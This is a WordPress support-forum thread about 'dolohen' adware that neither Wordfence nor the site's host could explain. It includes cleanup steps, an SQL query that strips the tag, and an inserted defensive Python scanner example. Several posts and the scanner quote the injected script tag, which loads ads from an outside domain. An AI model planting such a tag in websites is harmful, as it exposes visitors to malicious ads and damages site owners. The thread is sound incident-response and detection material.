Wordfence not finding adware
A customer reported that their virus scanner is reporting that my website is not safe. I used sucuri.net to check and it says I have Known javascript malware: rogueads.unwanted_ads?1 from dolohen.
I’ve had Wordfence installed since December and it hasn’t picked this up. I’ve run a high sensitivity scan and it isn’t finding anything. Can anyone help? I need to find which file the frame has been added please.
Most likely it is included in the premium rules. Are you using the premium version with updated rules?
No, I’m only using the free version.
Hi @slhatton,
I took a look at your website at https://hattonwillow.co.uk/ and found this:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
I believe this may have been injected into your /wp-includes/functions.php file.
Can you do a search for dolohen within that file?
Dave
Hi Dave,
Thanks for your reply.
That is the script that is appearing all over my website. I’ve taken a backup using FileZilla and run a search for dolohen. It found three results and I’ve removed that script from those files. It was not in the /wp-includes/functions.php file.
Also, could you please remove my website address from your reply as I don’t want it to appear in Google search results.
Any other ideas?
Thanks
This reply was modified 7 years, 1 month ago by slhatton.
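The file search discussed above, generalised as an added example (not code from any poster or from Wordfence): rather than grepping a backup for one known name, it lists every script tag that loads from a host outside an allowlist, including protocol-relative URLs like the injected one. The allowlisted host, the sample file names and their contents are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script ... src="..."> on one line, either quote style, any attribute order.
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
TEXT_EXT = {".php", ".js", ".html", ".htm", ".tpl", ".sql"}

def external_host(src):
    """Host a script src loads from; None for same-site relative paths."""
    if src.startswith("//"):  # protocol-relative URL, as in the injected tag
        src = "https:" + src
    host = urlparse(src).hostname
    return host.lower() if host else None

def scan_backup(root, allowed_hosts):
    """List (relative path, line number, host) for script tags whose host
    is not in allowed_hosts (a set of lowercase host names)."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TEXT_EXT:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_no, line in enumerate(text.splitlines(), 1):
            for src in SCRIPT_SRC.findall(line):
                host = external_host(src)
                if host and host not in allowed_hosts:
                    hits.append((path.relative_to(root).as_posix(), line_no, host))
    return hits

def demo():
    """Scan a small constructed backup (file names and contents are made up)."""
    injected = ('<script type="text/javascript" src="//dolohen.com/apu.php'
                '?zoneid=676630" async data-cfasync="false"></script>')
    samples = {
        "wp-content/plugins/example-plugin/view.php": "<?php ?>\n" + injected + "\n",
        "header.php": '<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
                      '<script src="https://cdn.example.org/lib.js"></script>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_backup(root, allowed_hosts={"cdn.example.org"})

if __name__ == "__main__":
    for rel, line_no, host in demo():
        print(f"{rel}:{line_no}: script loaded from {host}")
```

Including `.sql` in the extensions means a database dump placed in the backup folder is checked in the same pass, which covers injected tags stored in post content as well as in files.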
I literally spent hours and hours on this on Friday night. I completely cleaned my website using phpMyAdmin and also the Better Search Replace plugin and it was clean.
I replaced all my core WordPress files. I also replaced every plugin with files downloaded from the WordPress repository. I went through all my server log files to try and find out how they were getting in. I changed every password, database, control host, email, website.
My website was clean for 3 days, showing on Sucuri, Wordfence and GOTMLS as clean. I’ve had a few 500 errors on my website this weekend. I logged a call with tsohost and they disabled WooCommerce saying it was conflicting with another plugin. I’ve gone on my website and you guessed it, the dolohen.com adverts are popping up again.
Disappointed to say the least. Hours wasted. I think it’s no coincidence that we are all with tsohost. I have told them if they don’t take it seriously I will move to another host.
My database server also ends in 247!!!
I had two files that were infected on my website which were yith gift card files.
I have just re-opened the malware ticket that I had opened with tsohost. The person couldn’t even find the adverts so I don’t hold out much hope. I told him to open my website and click on any link!!!
I think we are all on the same range of database servers. Andrew?
To remove the adware from my database I’m running a find and replace through phpMyAdmin on the wp_posts table. This is the SQL code it uses:
UPDATE `wp_posts`
SET `post_content` = REPLACE(`post_content`, '<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>', '')
WHERE `post_content` LIKE '%<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>%' COLLATE utf8mb4_bin;
Obviously this won’t make a difference if it gets infected again straight away.
It took them an hour and a half to come back and say it’s not their fault!!!
I have further investigated the case with our seniors and this dolohen hack seems to be quite the new occurrence.
I found a topic which breaks it down a bit –
http://medericburlet.com/dolohem-wordpress-malware/
Most of our databases begin with 10.169.0, so that won’t be the pattern here.
Please also keep in mind that all cases are on WP CMS, which makes this more related to a WP vulnerability, than to our database servers.
I can also recommend following https://www.wordfence.com/blog/ and https://blog.sucuri.net/ for any updates and vulnerability updates from popular web security specialists.
I completely understand your concerns in regards to our servers, but I can assure you our database servers are fully secured and no breach was detected whatsoever as of now. We are still looking further into the case and we will make sure to get to the bottom of this supposed security breach, whether it’s related to us or to WordPress on our hosting.
Make sure to keep all your plugins updated to the latest version, as well as your WordPress version to the latest one, as that is the best way to be as secured as possible.
If you are a Wordfence customer, if you have posted tickets on their site then continue that conversation there.
These forums are not for any customers and I’ve archived all of the replies from this topic. I’ve also flagged some of the accounts as users were informed to start their own topic instead.
If you are not a Wordfence customer and just a user then feel free to start your own topic here.
But do not pile onto other people’s topics saying “let’s keep replying to get a reply from Wordfence”. Start your own topic instead.
The topic ‘Wordfence not finding adware’ is closed to new replies.